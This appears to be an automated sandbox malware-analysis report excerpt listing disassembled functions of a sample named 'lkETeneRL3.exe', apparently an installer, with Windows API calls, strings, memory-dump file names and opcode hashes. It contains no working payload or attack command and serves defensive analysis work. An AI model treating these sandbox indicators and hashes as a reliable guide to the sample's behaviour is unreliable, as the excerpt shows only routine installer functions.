CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403206,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 00406148

Strings

"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 0040610A
*?|<>/":, xrefs: 00406116
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004060CF

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\lkETeneRL3.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1801561115
Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D

Function 004040AF Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040CC
GetSysColor.USER32(00000000), ref: 004040E8
SetTextColor.GDI32(?,00000000), ref: 004040F4
SetBkMode.GDI32(?,?), ref: 00404100
GetSysColor.USER32(?), ref: 00404113
SetBkColor.GDI32(?,?), ref: 00404123
DeleteObject.GDI32(?), ref: 0040413D
CreateBrushIndirect.GDI32(?), ref: 00404147

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55

Function 00402C17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
GetTickCount.KERNEL32 ref: 00402C4D
wsprintfA.USER32 ref: 00402C7B

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
ShowWindow.USER32(00000000,00000005), ref: 00402CAD

Part of subcall function 00402BFB: MulDiv.KERNEL32(00000000,00000064,000001D6), ref: 00402C10

Strings

... %d%%, xrefs: 00402C75

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E

Function 00404947 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
GetMessagePos.USER32 ref: 0040496A
ScreenToClient.USER32(?,?), ref: 00404984
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC

Strings

f, xrefs: 00404998

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5

Function 00402B7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
wsprintfA.USER32 ref: 00402BCE
SetWindowTextA.USER32(?,?), ref: 00402BDE
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0

Strings

unpacking data: %d%%, xrefs: 00402BBC, 00402BCC
verifying installer: %d%%, xrefs: 00402BC3

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction ID: 59ddb31903a36680b4224ad2704aa62d89b79b457576c75755388437ec856a92
Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
Instruction Fuzzy Hash: D5F01D70900208AAEF205F60DD0ABAE3779FB04345F00803AFA16B51D0D7B9AA559B59

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98

Function 0040483D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Tristram Setup: Completed,Tristram Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
wsprintfA.USER32 ref: 004048E3
SetDlgItemTextA.USER32(?,Tristram Setup: Completed), ref: 004048F6

Strings

Tristram Setup: Completed, xrefs: 004048CD, 004048D2, 004048D8, 004048EC
%u.%u%s%s, xrefs: 004048C5

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Tristram Setup: Completed
API String ID: 3540041739-642899057
Opcode ID: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
Opcode Fuzzy Hash: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
Opcode Fuzzy Hash: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F

Function 00403AA8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40

Strings

"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 00403AA9
1033, xrefs: 00403AAC, 00403AB6, 00403B27
Tristram Setup: Completed, xrefs: 00403AAB

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\lkETeneRL3.exe"$1033$Tristram Setup: Completed
API String ID: 530164218-2403601231
Opcode ID: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
Opcode Fuzzy Hash: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58

Function 004058D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403218,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 004058DB
CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403218,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 004058E4
lstrcatA.KERNEL32(?,00409014), ref: 004058F5

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058D5

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE

Function 0040596E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0,00000000), ref: 0040597C
CharNextA.USER32(00000000), ref: 00405981
CharNextA.USER32(00000000), ref: 00405995

Strings

C:\, xrefs: 0040596F

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA

Function 00404FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040501F
CallWindowProcA.USER32(?,?,?,?), ref: 00405070

Part of subcall function 00404094: SendMessageA.USER32(00010456,00000000,00000000,00000000), ref: 004040A6

Strings

, xrefs: 00405000

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
